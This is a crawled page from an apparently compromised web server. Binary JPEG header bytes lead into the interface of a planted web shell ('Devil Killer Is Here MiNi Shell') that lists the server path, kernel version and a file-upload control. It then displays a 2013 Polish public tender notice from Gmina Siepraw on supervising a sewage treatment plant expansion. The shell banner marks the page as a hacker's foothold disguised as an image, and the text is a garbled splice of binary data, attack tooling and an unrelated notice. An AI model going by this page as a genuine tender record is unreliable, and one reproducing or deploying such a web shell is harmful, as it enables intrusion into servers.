JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130723/290420-N-2013.html

<p class="kh_header"><b>Siepraw: Sprawowanie nadzoru inwestorskiego nad realizacją zadania Rozbudowa i przebudowa oczyszczalni ścieków w Sieprawiu w ramach projektu:
Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce i Siepraw wokół Zalewu Dobczyckiego</b><br>
<b>Numer ogłoszenia: 290420 - 2013; data zamieszczenia: 23.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Siepraw , Siepraw 1, 32-447 Siepraw, woj. małopolskie, tel. 12 3721811, 3721819, 3721807, faks 12 3721806.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siepraw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie nadzoru inwestorskiego nad realizacją zadania Rozbudowa i przebudowa oczyszczalni ścieków w Sieprawiu w ramach projektu:
Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce i Siepraw wokół Zalewu Dobczyckiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na sprawowaniu nadzoru inwestorskiego nad realizacją zadania Rozbudowa i przebudowa oczyszczalni ścieków w Sieprawiu w ramach projektu - Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce i Gminy Siepraw wokół Zalewu Dobczyckiego.

2.	Kody i nazwy zamówienia wg Wspólnego Słownika Zamówień:
Główny przedmiot zamówienia:
71520000-9 usługi nadzoru budowlanego.
3. Ilekroć w specyfikacji istotnych warunków zamówienia użyto słów jak niżej należy przez to rozumieć:
- Kontrakt - umowa na wykonanie zadania inwestycyjnego.
- Wykonawca robót - wykonawca Kontraktu.
- Wykonawca - sprawujący nadzór nad realizacją zadania inwestycyjnego.
- Koordynator inspektorów nadzoru - sprawujący nadzór nad inspektorami branżowymi oraz bezpośrednio współpracujący z Zamawiającym.

4.	Zadanie realizowane jest w ramach projektu:
Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce i Siepraw wokół zalewu Dobczyckiego, który uzyskał dofinansowanie z Funduszu Spójności na warunkach określonych w umowie POIS.01.01.00-00-194/09-00 zawartej w dniu 30.07.2010r.

5.	Na zakres zadania składa się:
a) rozbudowa i przebudowa oczyszczalni ścieków w celu zwiększenia możliwości przyjęcia większej ilości zanieczyszczonych ścieków. Obecnie istniejąca, przewidziana do rozbudowy i modernizacji oczyszczalnia ścieków, zlokalizowana jest w miejscowości Siepraw,. Jest to oczyszczalnia mechaniczno - biologiczna, posiadająca przepustowość 318 m3/d. Ścieki surowe napływające do oczyszczalni gromadzone są w podziemnej pompowni, która wyrównuje zmienne stężenia zanieczyszczeń w dopływających ściekach i zmienne w czasie ilości dopływających ścieków, a także zatrzymuje ewentualne pozostałości stałych substancji organicznych. Planowane przedsięwzięcie polegać będzie na rozbudowie istniejącej oczyszczalni ścieków do przepustowości 1 000 m3/d. W trakcie przebudowy i rozbudowy oczyszczalni ścieków w pierwszej kolejności wybudowane zostaną wszystkie nowoprojektowane obiekty takie jak: zbiornik retencyjny, reaktor biologiczny, osadniki wtórne, pompownie cyrkulacyjne, wiata składowania osadu. Zakres obejmuje również rozruch oczyszczalni ścieków wraz ze szkoleniem personelu oraz koszty towarzyszące, tj. m.in.: 
- wyposażenie oczyszczalni ścieków zgodnie z rozporządzeniem MGPiB w sprawie bezpieczeństwa i higieny pracy w oczyszczalniach ścieków (Dz. U. nr 96 poz. 438); 
- dostawę ciągnika rolniczego z silnikiem diesel o mocy nie mniejszej niż 80 kW, minimalne wymagania zostały opisane w STWiOR.
- dostawę beczki asenizacyjnej w zestawie na czterech kołach o pojemności 6000 l; 
- dostawę agregatu prądotwórczego o mocy wyjściowej minimum 15 kW, silnik Diesel 4 -cylindrowy, napięcie 400/230V, zestaw na dwóch kołach, minimalne wymagania zostały opisane w STWiOR.
- dostawę lokalizatora nielegalnych przyłączy zadymiarz; 
- dostawę wybieraka do czyszczenia studzienek kanalizacyjnych, składany, uniwersalny, do 6 m głębokości o czaszy kulistej, 
- dostawa kamery do monitoringu kanalizacji - samojezdnej dla średnicy DN 100 do DN 400; 
- dostawę maszyny do mechanicznego czyszczenia rur o średnicy do 400 mm, zasięg 100 mb, zasilana napięciem 220/230 V, moc 1 kW, ok. 700 obr/min.
- dostawę kontenera otwartego KP-7 przystosowanego do urządzeń hakowych i bramowych (uniwersalny); 
- dostawę małego pojazdu do ciśnieniowego czyszczenia kanalizacji, o minimalnych wymaganiach: całkowita waga do 7,5 t; pojemność zbiornika 3,5 m3; wydajność pompy ssącej 430 m3/h; napęd hydrauliczny wykorzystany z pojazdu bazowego; otwierana dennica do czyszczenia i opróżniania zbiornika zamykana na zatrzask z tyłu; haki do transportu węży; kołowrót z wężem ssawnym z tyłu lub z boku zbiornika.

Zakres robót budowlanych objęty jest prawomocnym pozwoleniem na budowę nr 511/2012 z dnia 12.07.2012r. wydanym przez Starostę Myślenickiego.

Szczegółowy opis realizacji projektu - Bilans terenu
- powierzchnia działki nr 1117/3 2,22 ha = 22.200,00 m2
- teren objęty opracowaniem w granicy ogrodzenia ~ 5.995,00 m2
- pow. zabudowy obiektów istniejących adaptowanych podlegających rozbudowie i przebudowie 419,37 m2
- pow. zabudowy obiektów projektowanych 792,72 m2
- nawierzchnia szczelna 11,00 m2
- drogi wewnętrzne 611,00 m2
- chodniki technologiczne i opaski wokół budynków 495,00 m2
- chodnik z możliwością wjazdu pojazdów 50,00 m2
- zieleń 3.615,91 m2

b)	budowa budynku magazynowo - garażowego wg odrębnego opracowania, na którą uzyskano decyzję pozwolenia na budowę Nr 522/2009 z dnia 08.06.2009r. W projekcie zaplanowano budowę dwóch budynków, z czego jeden został zrealizowany w 2010r. Pozostały niezrealizowany zakres, tj. budowa budynku magazynowo - garażowego został zlokalizowany na rys. nr 1/A Projekt  zagospodarowania terenu - dokumentacji projektowej Rozbudowy i przebudowy oczyszczalni ścieków w Sieprawiu. Zaprojektowany budynek będzie stanowił prostopadłościan o regularnym obrysie. Budynek będzie murowanym obiektem wolnostojącym, parterowym, niepodpiwniczonym o wysokości od poziomu terenu do kalenicy 6,87m (wysokość od poziomu posadzki parteru 6,72m). Budynek będzie przykryty dachem dwuspadowym, symetrycznym, kalenicowym o nachyleniu połaci 300. Obiekt zaliczony został do grupy wysokościowej budynków niskich N.

Szczegółowy opis realizacji projektu - Bilans terenu
Powierzchnia zabudowy kubaturowej - 117,00 m2
Powierzchnia całkowita 117,00 m2
Powierzchnia użytkowa 98,40 m2
Kubatura 608 m3
Długość elewacji frontowej 13,03 m
Szerokość elewacji 8,98 m

Zakres zadania obejmuje:
1)	Roboty budowlane oczyszczalni ścieków wraz z zagospodarowaniem terenu.
2)	Roboty budowlane budynku magazynowo - garażowego.
3)	Roboty drogowe.
4)	Sieci zewnętrzne wod-kan i technologiczne.
5) Technologia oczyszczalni ścieków.
6) Instalacje wod-kan.
7) Instalacje grzewcze z kotłownią gazową.
8) Instalacje wentylacji mechanicznej.
9) Instalacje elektryczne i AKPiA.

6. Opis lokalizacji zadania: 
Planowane zadanie jest zlokalizowane na terenie miejscowości Siepraw w zachodniej jego części, Gmina Siepraw, powiat myślenicki, województwo małopolskie na działce o numerze ewidencyjnym 1117/3, która stanowi własność Gminy Siepraw. 

7. Szczegółowy opis przedmiotu zamówienia zawiera:
- Dokumentacja projektowa - Załącznik nr 11 do siwz,
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych - Załącznik nr 10 do siwz, 
- Pomocniczo - Przedmiar robót  - Załącznik nr 9 do siwz.
Zamawiający zamieścił w/w dokumentację pod następującym adresem: http://www.siepraw.pl/index.php?option=16&action=news_show&news_id=954

8.	Głównym obowiązkiem Wykonawcy będzie sprawowanie nadzoru inwestorskiego nad realizacją zadań przez wykonywanie wszystkich obowiązków inspektora nadzoru  wynikających z art. 25, 26, 27 ustawy Prawo budowlane, w tym między innymi:
a) reprezentowanie Zamawiającego podczas wykonywania zadania inwestycyjnego przez sprawowanie kontroli zgodności jego realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej.
b) sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie.
c) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania.
d) potwierdzanie faktycznie wykonanych prac oraz usunięcia wad, a także kontrolowanie rozliczeń kontraktu.
e) wydawanie kierownikowi robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych.
f) żądanie od kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.
g) pełnienia funkcji koordynatora inspektorów nadzoru.
h) przygotowywania i kompletowania dokumentów niezbędnych do rozliczenia dofinansowania z POIiŚ.

9.	Do obowiązków Wykonawcy będzie należało w szczególności:
9.1. Na etapie realizacji zadania:
1)	sporządzenie i przekazanie Zamawiającemu do zatwierdzenia instrukcji określających formę, zakres i sposób obiegu dokumentów wymaganych od Wykonawcy Robót,
2)	uczestniczenia w opracowaniu harmonogramu rzeczowo-finansowego zadania z Wykonawcą Robót.
3)	uczestniczenie w przekazaniu przez Zamawiającego placu budowy Wykonawcy Robót;
4)	sporządzenie i przekazanie Wykonawcy Robót zatwierdzonego przez Zamawiającego wzoru protokołu odbioru częściowego (Raportu o postępie prac) stanowiącego podstawę do rozliczeń;
5)	zatwierdzanie przedstawionych przez Wykonawcę Robót technologii robót, planów BIOZ;
6)	koordynację czynności inspektorów nadzoru inwestorskiego;
7)	sprawdzanie wykonania robót i powiadamianie Wykonawcy Robót o wykrytych wadach oraz poświadczanie usunięcia wad przez Wykonawcę Robót, a także ustalanie rodzaju i zakresu koniecznych do wykonania robót poprawkowych, (wystawienie protokołu niezgodności);
8)	opisywanie pod względem merytorycznym faktur VAT wystawianych przez Wykonawcę Robót;
9)	kontrolowanie zgodności realizacji zadania z przyjętym w Kontrakcie harmonogramem rzeczowo - finansowym. (nadzór, kontrola, raportowanie i sprawozdawczość w zakresie rzeczowym i finansowym Kontraktu);
10)	nadzorowanie postępu Kontraktu  pod względem technicznym, jakościowym, finansowym, organizacyjnym, formalnym i terminowym;
11)	realizacja przyjętych obowiązków poprzez przeprowadzanie regularnych inspekcji terenu budowy oraz testów w celu kontroli jakości stosowanych i lub dostarczonych materiałów, maszyn, urządzeń oraz wykonanych robót zgodnie ze sztuką budowlaną i umową na roboty. Zamawiający wymaga, aby koordynator zespołu przeprowadzał inspekcje placu budowy CODZIENNIE. W przypadku nieobecności koordynatora zespołu zobowiązany jest wyznaczyć swojego zastępcę o równoważnych kwalifikacjach i doświadczeniu. Wykonawca musi zwrócić się do Zamawiającego z wnioskiem o wyrażenie zgody na zastępstwo wraz z przedłożeniem dokumentów potwierdzających równoważne doświadczenie i kwalifikacje osoby zastępującej. Zastępstwo wymaga pisemnej zgody Zamawiającego, i nie wymaga zmiany postanowień umowy.
12)	Wykonawca zobowiązany jest do przekazywania przedstawicielowi Zamawiającego w Urzędzie Gminy Siepraw raportu ustnego o postępie prac, w przypadku, gdy przedstawiciel Zamawiającego nie bierze udziału w inspekcji codziennej.
13)	Realizacja przyjętych obowiązków poprzez przeprowadzanie minimum raz w tygodniu narad koordynacyjnych na budowie z udziałem Zespołu Inspektorów Nadzoru, Kierownika Budowy i Zespołu Kierowników Robót Branżowych, przedstawiciela Zamawiającego. Z przeprowadzonych narad Wykonawca zobowiązany jest sporządzić notatkę/protokół z tych spotkań i przekazywanie ich wszystkim uczestnikom spotkania w narady koordynacyjnej.
14)	uczestniczenie w pracach zespołu zadaniowego oraz we wszelkiego rodzaju naradach i spotkaniach dotyczących realizacji zadania;
15)	zapewnienie obecności na placu budowy branżowych inspektorów nadzoru w zakresie niezbędnym do prawidłowego i skutecznego nadzoru, tj. minimum dwa razy raz w tygodniu w czasie trwania robót branżowych, nad którymi sprawują nadzór, a w przypadkach nagłych, podejmą czynności związane z pełnioną funkcją (na miejscu prowadzenia robót) w czasie nie dłuższym niż 24 godziny od zawiadomienia przez Zamawiającego lub wykonawcę robót. W czasie każdorazowego pobytu na terenie budowy branżowy inspektor nadzoru ma obowiązek dokonania przeglądu dziennika budowy oraz potwierdzenia swojej bytności i dokonanych czynności stosownym zapisem w Dzienniku budowy (w zakresie czynności powierzonych poszczególnym inspektorom nadzoru);
16)	w przypadku nie prowadzenia robót budowlanych nie stosuje się podpunktów 11-15,
17)	 kontrolowanie prawidłowości prowadzenia dziennika budowy;
18)	analizowanie i sugerowanie wszelkich zmian w projektach, które mogą okazać się niezbędne lub pożądane podczas lub po wykonaniu prac budowlanych objętych zadaniem;
19)	zgłaszanie wad dokumentacji projektowej w trakcie wykonywania zadania w terminach umożliwiających ich usunięcie przez projektanta bez opóźnienia terminów zakończenia poszczególnych części robót;
20)	analizowanie wszystkich decyzji, uzgodnień i postanowień uzyskanych w trakcie przygotowania i realizacji nadzorowanego zadania i zapewnienie spełnienia zawartych w nich wymagań;
21)	informowanie o wszystkich występujących problemach oraz problemach przewidywanych i podejmowanych działaniach zapobiegawczych lub naprawczych dla ich przezwyciężenia;
22)	opiniowanie wniosku Wykonawcy Robót o zmianę harmonogramu;
23)	podjęcie czynności, o których mowa w § 4 załącznika nr 5 SIWZ (Istotne Postanowienia Umowy) w przypadku zgłoszenia przez Wykonawcę konieczności wykonania robót dodatkowych lub zamiennych;
24)	nadzorowanie wypełniania przez projektantów obowiązków wynikających z pełnienia nadzoru autorskiego;
25)	uzgadnianie z Zamawiającym, Wykonawcą Robót i projektantem ewentualnych robót i urządzeń zamiennych;
26)	zatwierdzanie materiałów budowlanych i instalacyjnych, urządzeń i dostaw przewidzianych przez Wykonawcę Robót do wbudowania, kontroli dokumentów jakości, deklaracji zgodności i certyfikatów zgodnie z dostarczoną przez Zamawiającego dokumentacją;
27)	sprawdzanie zgodności dostaw urządzeń z Kontraktem i sprawdzanie kompletności wymaganych atestów, aprobat i gwarancji na te urządzenia;
28)	sprawdzanie i przedkładanie Zamawiającemu wymaganych od Wykonawcy Robót gwarancji i instrukcji obsługi;
29)	kontrolowanie sposobu składowania i przechowywania materiałów oraz uporządkowania miejsc składowania po zakończeniu robót;
30)	kontrolowanie prowadzenia robót w aspekcie nie zakłócania pracy istniejących sieci;
31)	egzekwowanie od Wykonawcy Robót terminowego zakończenia robót;
32)	organizowanie badań jakości w specjalistycznych instytutach naukowych, jeśli będzie to konieczne, po uprzedniej akceptacji Zamawiającego;
33)	kontrolowanie zapewnienia należytego poziomu ochrony zdrowia i bezpieczeństwa oraz wstrzymanie robót prowadzonych w sposób zagrażający bezpieczeństwu lub niezgodnie z wymaganiami Kontraktu;
34)	współpracowanie z Zamawiającym w egzekwowaniu postanowień Kontraktu, w tym określanie punktów krytycznych Kontraktu, zapewnienie wdrażania procedur jakościowych, przygotowanie i aktualizacja planów i harmonogramów oraz wszelkich innych dokumentów, których przygotowanie okaże się konieczne;
35)	identyfikowanie i kontrolowanie ryzyka niewłaściwego lub nieterminowego zrealizowania Kontraktu, egzekwowanie od Wykonawcy Robót oraz akceptowanie programów naprawczych w celu usuwania wszelkich niekorzystnych zmian dotyczących jakości, kosztów i terminów realizacji Kontraktu;
36)	przeprowadzanie z Wykonawcą Robót odbiorów robót ulegających zakryciu lub zanikających, niezbędnych przeglądów oraz odbiorów częściowych i końcowego realizowanego zadania  z udziałem przedstawicieli Zamawiającego;
37)	informowanie Zamawiającego o roszczeniach Wykonawcy Robót;
38)	dokumentowanie wszelkich postępów prac oraz egzekwowanie od Wykonawcy Robót prowadzenia dokumentacji fotograficznej z realizacji Kontraktu; zdjęcia w ilości niezbędnej winny być opisane (data i przedmiot) oraz zarchiwizowane w formacie cyfrowym (nośnik DVD lub CD) i przekazywane Zamawiającemu wraz z każdym raportem;
39)	uczestniczenie podczas ewentualnych kontroli zadania jako doradca techniczny;
40)	udzielanie Wykonawcy Robót pomocy w zakresie uzyskiwania wszelkich koniecznych dokumentów i pozwoleń, w tym pozwoleń na użytkowanie obiektu decyzji pozwolenia wodnoprawnego na odprowadzenie oczyszczonych ścieków do rzeki Sieprawki;
41)	uczestniczenie w rozwiązywaniu wszelkiego rodzaju skarg i roszczeń osób trzecich wynikłych podczas realizacji zadania;
42)	w przypadku rozwiązania lub odstąpienia od Kontraktu dopilnowanie zabezpieczenia przez Wykonawcę Robót placu budowy oraz rozliczenie Kontraktu;
43)	pełnienie nadzoru nad odbiorami, próbami końcowymi i eksploatacyjnymi i akceptacja wszystkich prób przed oddaniem do eksploatacji;
44)	dokonanie przeglądu instrukcji obsługi wykonanych przez Wykonawcę Robót w celu prawidłowego przejęcia ukończonych prac przez Zamawiającego;
45)	uczestniczenie w kompletowaniu i sprawdzaniu dokumentacji odbiorowych oraz uczestniczenie w rozliczaniu zadania,  pomiędzy Wykonawcą Robót, Zamawiającym i Instytucją Wdrażającą Program Infrastruktura i Środowisko,
46)	przedstawianie Zamawiającemu okresowych, pisemnych sprawozdań dotyczących realizacji zadania z uwzględnieniem zasad monitorowania wymaganych przez Instytucję Wdrażającą Program Infrastruktura i Środowisko.
47)	zapewnienie działań logistycznych i administracyjnych niezbędnych do wykonania niniejszego zamówienia, w tym m.in.: zakwaterowania, wynagrodzenia i pokrywania wszelkich kosztów związanych z delegacjami, podróżami, itp. personelu Inspektora. 

9.2. Na etapie po zakończeniu realizacji zadania:
1)	obsługa dokumentacyjna komisji odbioru końcowego powołanej przez Zamawiającego, w tym: przygotowywanie protokołu odbioru końcowego, sprawdzenie dokumentacji odbiorowej przekazanej przez Wykonawcę Robót do odbioru końcowego;
2)	uczestniczenie w przekazaniu przez Wykonawcę Robót wykonanych obiektów do eksploatacji;
3)	przygotowanie dokumentów dla sporządzenia dowodów OT i PT;
4)	przedłożenie raportu końcowego po zakończeniu robót budowlanych w terminie do 14 dni od dnia podpisania protokołu odbioru końcowego prac, w którym należy zawrzeć następujące informacje:
a)	kopie protokołu odbioru końcowego,
b)	analizę końcową kosztorysów powykonawczych,
c)	informacje raporty lub protokoły z rozruchu i/lub prób końcowych i eksploatacyjnych,
d)	wykaz decyzji, pozwoleń, i innych wymaganych dla poprawnej eksploatacji,
e)	wykaz spraw spornych i sposobu ich rozwiązania,
f)	pełną dokumentację fotograficzną z realizacji Kontraktu,
g)	informacje o wypełnianiu obowiązków wynikających z uzyskanych decyzji oraz z przepisów prawa,
5)	pełnienie nadzoru nad odbiorami, próbami końcowymi i eksploatacyjnymi w okresie zgłaszania wad.
6)	udział w negocjacjach dotyczących nierozstrzygniętych roszczeń i sporów.

10.Wynagrodzenie nie będzie podlegało zmianom w czasie trwania umowy, na wysokość wynagrodzenia nie będzie miała wpływu zmiana zakresu realizacji zadania oraz zmiana terminu jego wykonania.

11. Wykonawca w dniu przystąpienia do wykonania przedmiotu umowy przedłoży polisę lub inne dokumenty ubezpieczenia potwierdzające zawarcie na okres od dnia rozpoczęcia do dnia ukończenia robót ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia, na kwotę nie mniejszą niż cena ofertowa.

12. Postanowienia Zamawiającego:
1) Zamawiający zamierza zawrzeć z Wykonawcą umowę z wynagrodzeniem ryczałtowym.
2) Zamawiający nie zabezpiecza pomieszczeń biurowych dla Wykonawcy dla realizacji zamówienia.
3) Wykonawca swoje biura powinien umiejscowić w pobliżu lub na terenie realizacji zadania.
4) Członkowie zespołu nadzoru inwestorskiego nie mogą być pracownikami przyszłego Wykonawcy Robót budowlanych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przed upływem terminu składania ofert, Wykonawca zobowiązany jest wnieść wadium w wysokości 10 000,00 zł (słownie: dziesięć tysięcy złotych).
1.1. Wadium może być wniesione w jednej lub kilku formach wymienionych poniżej:
a)	w pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
1.2.	Wadium w formie pieniężnej winno być wniesione przelewem na konto Zamawiającego w  KBS o/SIEPRAW Nr: 59 8591 0007 0240 0000 0228 0006 z dopiskiem: Wadium - Sprawowanie nadzoru inwestorskiego nad zadaniem Rozbudowa i przebudowa oczyszczalni ścieków w Sieprawiu - znak IIGZP.271.6.2013
1.3.	Wadium w formie poręczeń lub gwarancji musi być złożone w oryginale w kasie Urzędu Gminy Siepraw i musi obejmować cały okres związania ofertą. Kasa jest czynna w dni robocze: poniedziałek w godzinach od 9.00 - 16.00; wtorek - piątek w godzinach od 8.00 - 15.00. Kserokopię wadium potwierdzoną za zgodność z oryginałem należy załączyć do oferty.
2.	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 46 ustawy.
3.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
1)	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
2)	wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
4.	Wykonawca, którego oferta nie będzie zabezpieczona prawidłowo wniesionym wadium zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
